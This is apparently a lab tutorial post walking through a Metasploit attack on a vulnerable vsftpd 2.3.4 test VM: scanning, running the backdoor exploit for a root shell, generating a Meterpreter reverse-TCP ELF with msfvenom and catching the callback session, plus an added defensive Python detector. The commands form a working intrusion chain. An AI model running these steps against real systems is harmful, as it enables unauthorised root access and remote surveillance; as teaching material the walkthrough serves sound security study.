Metasploit in Practice: Exploiting an FTP Vulnerability
2019-07-09
DreamsonMa
This section walks through penetration-testing an FTP vulnerability with Metasploit.
Step 1: set up a PostgreSQL instance.
1. Start postgresql
➜ ~ systemctl start postgresql
➜ ~ systemctl status postgresql
● postgresql.service - PostgreSQL RDBMS
Loaded: loaded (/lib/systemd/system/postgresql.service; disabled;
Active: active (exited) since Mon 2019-07-08 11:16:50 EDT; 11s ago
Process: 3069 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 3069 (code=exited, status=0/SUCCESS)
Jul 08 11:16:50 kali systemd[1]: Starting PostgreSQL RDBMS...
Jul 08 11:16:50 kali systemd[1]: Started PostgreSQL RDBMS.
➜ ~ systemctl enable postgresql
Synchronizing state of postgresql.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable postgresql
Created symlink /etc/systemd/system/multi-user.target.wants/postgresql.service → /lib/systemd/system/postgresql.service.
2. Create the user msf with the password 123456
3. Create the database msf
➜ ~ sudo -u postgres psql
psql (11.1 (Debian 11.1-2))
Type "help" for help.
postgres=# create user "msf" with password '123456' nocreatedb;
CREATE ROLE
postgres=# create database "msf" with owner="msf";
CREATE DATABASE
Step 2: run the penetration test with Metasploit.
1. Open the msfconsole console. The "No database support: No database YAML file" warning printed at startup means Metasploit found no database.yml; the database is attached manually with db_connect in the next step.
➜ ~ msfconsole
[-] *** Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
[-] ***
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
msf5 >
2. Connect to a database instance
msf5 > db_connect msf:123456@127.0.0.1/msf
Connected to Postgres data service: 127.0.0.1/msf
msf5 > db_status
[*] Connected to msf. Connection type: postgresql. Connection name: zF0rip8x.
3. Probe the target's FTP service with nmap
msf5 > db_nmap -sV -p 21 10.0.2.5
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-08 11:34 EDT
[*] Nmap: Nmap scan report for 10.0.2.5
[*] Nmap: Host is up (0.00037s latency).
[*] Nmap: PORT   STATE SERVICE VERSION
[*] Nmap: 21/tcp open  ftp     vsftpd 2.3.4
[*] Nmap: MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
[*] Nmap: Service Info: OS: Unix
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
4. Review the service records stored in the database
msf5 > services
Services
========
host      port  proto  name  state  info
----      ----  -----  ----  -----  ----
10.0.2.5  21    tcp    ftp   open   vsftpd 2.3.4
10.0.2.5  2121  tcp    ftp   open   ProFTPD 1.3.1
5. Search for an exploit module
msf5 > search vsftpd 2.3.4
Matching Modules
================
Name                                                      Disclosure Date  Rank       Check  Description
----                                                      ---------------  ----       -----  -----------
auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
6. Set the payload and module options. Note that the transcript below types "set playload", which only creates an unused datastore variable named playload; the exploit still succeeds because, with no payload set, Metasploit falls back to the only compatible payload, cmd/unix/interact, which is the single entry shown by show payloads.
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
Name               Disclosure Date  Rank    Check  Description
----               ---------------  ----    -----  -----------
cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set playload cmd/unix/interact
playload => cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name    Current Setting  Required  Description
----    ---------------  --------  -----------
RHOSTS                   yes       The target address range or CIDR identifier
RPORT   21               yes       The target port (TCP)

Exploit target:

Id  Name
--  ----
0   Automatic
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.0.2.5
rhosts => 10.0.2.5
7. Verify that the options were set
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name    Current Setting  Required  Description
----    ---------------  --------  -----------
RHOSTS  10.0.2.5         yes       The target address range or CIDR identifier
RPORT   21               yes       The target port (TCP)

Exploit target:

Id  Name
--  ----
0   Automatic
8. Run the exploit and obtain a shell
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.0.2.5:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.2.5:21 - USER: 331 Please specify the password.
[+] 10.0.2.5:21 - Backdoor service has been spawned, handling...
[+] 10.0.2.5:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.0.2.12:41947 -> 10.0.2.5:6200) at 2019-07-08 11:44:36 -0400
whoami
root
id
uid=0(root) gid=0(root)
pwd
/
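As an added example (not part of the original post), the following Python takes the defender's view of the two facts this step establishes, the vsftpd 2.3.4 banner reported by db_nmap and the backdoor shell arriving on TCP 6200, and flags both from an inventory row and from netstat output. The rule table, the sample services rows and the netstat lines are constructed for the demonstration.

```python
import re

# Constructed rule table for this page's scenario: the vsftpd 2.3.4 build is the
# backdoored release, whose trigger opens a root shell listening on TCP 6200.
VULNERABLE_FTP = {
    ("vsftpd", "2.3.4"): "backdoored release; listens on TCP 6200 when triggered",
}
BACKDOOR_PORT = 6200

# One row of msfconsole's `services` table: host port proto name state info
SERVICE_RE = re.compile(
    r"^(?P<host>\S+)\s+(?P<port>\d+)\s+tcp\s+ftp\s+open\s+(?P<product>\S+)\s+(?P<version>\S+)$"
)
# One row of `netstat -tlnp`: proto recv-q send-q local foreign state pid/program
LISTEN_RE = re.compile(
    r"^tcp6?\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTEN(?:\s+(?P<proc>\S+))?$"
)

# Constructed sample input, shaped like the `services` output shown above.
SAMPLE_SERVICES = [
    "host      port  proto  name  state  info",
    "10.0.2.5  21    tcp    ftp   open   vsftpd 2.3.4",
    "10.0.2.5  2121  tcp    ftp   open   ProFTPD 1.3.1",
]
# Constructed netstat output from a host on which the backdoor listener is up.
SAMPLE_NETSTAT = [
    "tcp        0      0 0.0.0.0:21       0.0.0.0:*   LISTEN      -",
    "tcp        0      0 0.0.0.0:6200     0.0.0.0:*   LISTEN      -",
]

def flag_vulnerable_services(lines):
    """Return (host, port, reason) for every FTP row whose version is known bad."""
    findings = []
    for line in lines:
        m = SERVICE_RE.match(line.strip())
        if m is None:
            continue  # header, separator or a row that is not an open FTP service
        key = (m["product"].lower(), m["version"])
        if key in VULNERABLE_FTP:
            findings.append((m["host"], int(m["port"]), VULNERABLE_FTP[key]))
    return findings

def backdoor_listeners(netstat_lines):
    """Return (address, program) for sockets listening on the backdoor port."""
    hits = []
    for line in netstat_lines:
        m = LISTEN_RE.match(line.strip())
        if m and int(m["port"]) == BACKDOOR_PORT:
            hits.append((m["addr"], m["proc"] or "?"))
    return hits
```

Run flag_vulnerable_services over the exported services table and backdoor_listeners over netstat output collected from the FTP host; a hit from the second function on a host that was not being tested is an indicator the backdoor has already been triggered.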
Step 3: inject a more capable Meterpreter payload.
1. Find a payload
➜ ~ msfvenom --list payloads | grep linux | grep meterpreter| grep x86 | grep reverse_tcp
linux/x86/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker
linux/x86/meterpreter/reverse_tcp_uuid Inject the mettle server payload (staged). Connect back to the attacker
linux/x86/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
2. Inspect the payload's options
➜ ~ msfvenom -p linux/x86/meterpreter_reverse_tcp --list-options
Options for payload/linux/x86/meterpreter_reverse_tcp:
=========================
Name: Linux Meterpreter, Reverse TCP Inline
Module: payload/linux/x86/meterpreter_reverse_tcp
Platform: Linux
Arch: x86
Needs Admin: No
Total size: 1022972
Rank: Normal
Provided by:
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port
3. Generate the payload
➜ ~ msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=10.0.2.12 -f elf > /tmp/backdoor.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1022972 bytes
Final size of elf file: 1022972 bytes
4. Start the listener. Note that the handler is given the staged payload linux/x86/meterpreter/reverse_tcp, whereas msfvenom generated the stageless linux/x86/meterpreter_reverse_tcp in the previous step; the session still came up in this run, but the handler's payload should normally match the one that was generated.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.0.2.12
LHOST => 10.0.2.12
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.2.12:4444
5. Upload the payload through the FTP service; see the article 《FTP漏洞原理及利用》 (FTP Vulnerability Principles and Exploitation).
6. Run the uploaded payload from the shell obtained in Step 2
chmod +x /tmp/backdoor.elf
chown root. /tmp/backdoor.elf
ls -l /tmp
total 1004
-rw------- 1 tomcat55 nogroup       0 Jul  8 10:41 4480.jsvc_up
-rwxr--r-- 1 root     root    1022972 Jul  8 12:07 backdoor.elf
/tmp/backdoor.elf
7. Receive the reverse shell (this one can run Meterpreter commands!)
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.2.12:4444
[*] Sending stage (914728 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:42620) at 2019-07-08 12:18:42 -0400
meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getpid
Current pid: 4909
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > ?

Core Commands
=============

Command                   Description
-------                   -----------
?                         Help menu
background                Backgrounds the current session
bg                        Alias for background
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information or control active channels
close                     Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
guid                      Get the session GUID
help                      Help menu
info                      Displays information about a Post module
irb                       Open an interactive Ruby shell on the current session
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
migrate                   Migrate the server to another process
pry                       Open the Pry debugger on the current session
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
sessions                  Quickly switch to another session
set_timeouts              Set the current session timeout values
sleep                     Force Meterpreter to go quiet, then re-establish session.
transport                 Change the current transport mechanism
use                       Deprecated alias for "load"
uuid                      Get the UUID for the current session
write                     Writes data to a channel

Stdapi: File system Commands
============================

Command                   Description
-------                   -----------
cat                       Read the contents of a file to the screen
cd                        Change directory
checksum                  Retrieve the checksum of a file
chmod                     Change the permissions of a file
cp                        Copy source to destination
dir                       List files (alias for ls)
download                  Download a file or directory
edit                      Edit a file
getlwd                    Print local working directory
getwd                     Print working directory
lcd                       Change local working directory
lls                       List local files
lpwd                      Print local working directory
ls                        List files
mkdir                     Make directory
mv                        Move source to destination
pwd                       Print working directory
rm                        Delete the specified file
rmdir                     Remove directory
upload                    Upload a file or directory

Stdapi: Networking Commands
===========================

Command                   Description
-------                   -----------
arp                       Display the host ARP cache
getproxy                  Display the current proxy configuration
ifconfig                  Display interfaces
ipconfig                  Display interfaces
netstat                   Display the network connections
portfwd                   Forward a local port to a remote service
resolve                   Resolve a set of host names on the target
route                     View and modify the routing table

Stdapi: System Commands
=======================

Command                   Description
-------                   -----------
execute                   Execute a command
getenv                    Get one or more environment variable values
getpid                    Get the current process identifier
getuid                    Get the user that the server is running as
kill                      Terminate a process
localtime                 Displays the target system's local date and time
pgrep                     Filter processes by name
pkill                     Terminate processes by name
ps                        List running processes
shell                     Drop into a system command shell
suspend                   Suspends or resumes a list of processes
sysinfo                   Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

Command                   Description
-------                   -----------
webcam_chat               Start a video chat
webcam_list               List webcams
webcam_snap               Take a snapshot from the specified webcam
webcam_stream             Play a video stream from the specified webcam

Stdapi: Mic Commands
====================

Command                   Description
-------                   -----------
listen                    listen to a saved audio recording via audio player
mic_list                  list all microphone interfaces
mic_start                 start capturing an audio stream from the target mic
mic_stop                  stop capturing audio

Stdapi: Audio Output Commands
=============================

Command                   Description
-------                   -----------
play                      play an audio file on target system, nothing written on disk